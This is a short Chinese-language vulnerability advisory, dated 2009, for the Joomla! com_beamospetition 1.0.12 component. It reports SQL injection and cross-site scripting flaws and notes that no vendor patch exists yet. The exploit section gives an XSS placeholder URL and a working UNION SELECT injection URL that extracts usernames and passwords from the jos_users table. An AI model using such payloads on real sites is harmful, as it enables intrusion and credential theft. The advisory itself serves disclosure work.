添加时间:
2009-02-01

系统编号:
WAVDB-01311
BUGTRAQ: 33391

影响版本:
Arthur Konze com_beamospetition 1.0.12

程序介绍:

Joomla!是一款开放源码的内容管理系统（CMS）。

漏洞分析:

Joomla!的com_beamospetition组件实现上存在输入验证漏洞，远程攻击者可能利用此漏洞实现SQL注入或跨站脚本执行攻击。 攻击者可以利用这些漏洞窃取认证信息或获取对应用的控制。

漏洞利用:

http://www.example.com/?option=com_beamospetition&func=sign&pet='>[XSS]
http://www.example.com/?option=com_beamospetition&func=sign&mpid=-9999'%20union%20select%200,1,username,password,4,5,6,7,8,9,10,11,12,13,14,15%20from%20jos_users/

解决方案:
厂商补丁：
Arthur Konze
------------
目前厂商还没有提供补丁或者升级程序，我们建议使用此软件的用户随时关注厂商的主页以获取最新版本：http://joomlacode.org/gf/project/beamospetition/